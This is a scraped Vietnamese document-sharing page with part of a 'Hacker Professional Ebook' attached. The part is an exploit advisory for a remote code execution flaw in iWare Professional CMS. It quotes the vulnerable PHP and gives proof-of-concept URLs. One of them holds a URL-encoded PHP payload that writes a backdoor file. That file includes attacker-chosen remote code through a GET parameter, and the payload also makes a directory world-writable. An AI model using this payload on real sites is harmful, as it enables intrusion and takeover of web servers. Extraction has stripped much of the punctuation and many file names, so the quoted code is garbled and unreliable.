tailieunhanh - Hacker Professional Ebook part 387

Tham khảo tài liệu 'hacker professional ebook part 387', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | ------------------------------------------------------------------------ iWare Pro Remote Code Execution Vulnerability ------------------------------------------------------------------------ Affected Software . iWare Professional CMS Vendor. http Download. http Description. iWare is a Open Source PHP MySQL Content Management System Class. Remote Code Execution Risk. High Remote Code Execution Found By. nuffsaid nuffsaid at ---------------------------------------------------------------------- Details iWare admin mods does not sanatize the message variable in the first argument of the PostMessage function on line 11 before writing the variable contents to on line 25. When is requested the PostMessage function is called on line 32 and _REQUEST msg is written to unsanatized. Vulnerable Code admin mods line s 11-32 - 11 function PostMessage message - 16 new_message . message. br n - 23 open_file fopen w - 25 fputs open_file stripslashes new_message - 28 fclose open_file - 29 - 32 if _REQUEST talk 1 PostMessage _REQUEST msg Proof Of Concept http target path admin mods talk 1 msg evilcode http target path admin mods - http target path admin mods talk 1 msg 3C 3Fphp 0D 0A 24open_file 3D fopen 28 22. 2F. 2F. 2Fevilf 22 2C 22w 22 29 3B 0D 0Afputs 28 24open_file 2C 22 3C 3Fphp include 28 5C 24_GET 5B 27evil_include 27 5D 29 3 B 3F 3E 22 29 3B 0D 0Afclose 28 24open_file 29 3B 0D 0Ac hmod 28 22. 2F. 2F. 22 2C0777 29 3B 0D 0A 3F 3E - http target path admin mods - http target path evil_include http ------------------------------------------------------------------ Black_hat_cr HCE Ixprim CMS Remote

TÀI LIỆU LIÊN QUAN
10    158    1
6    184    1
7    162    1
5    157    1
6    160    1
6    152    1
6    150    1
6    206    1
7    154    1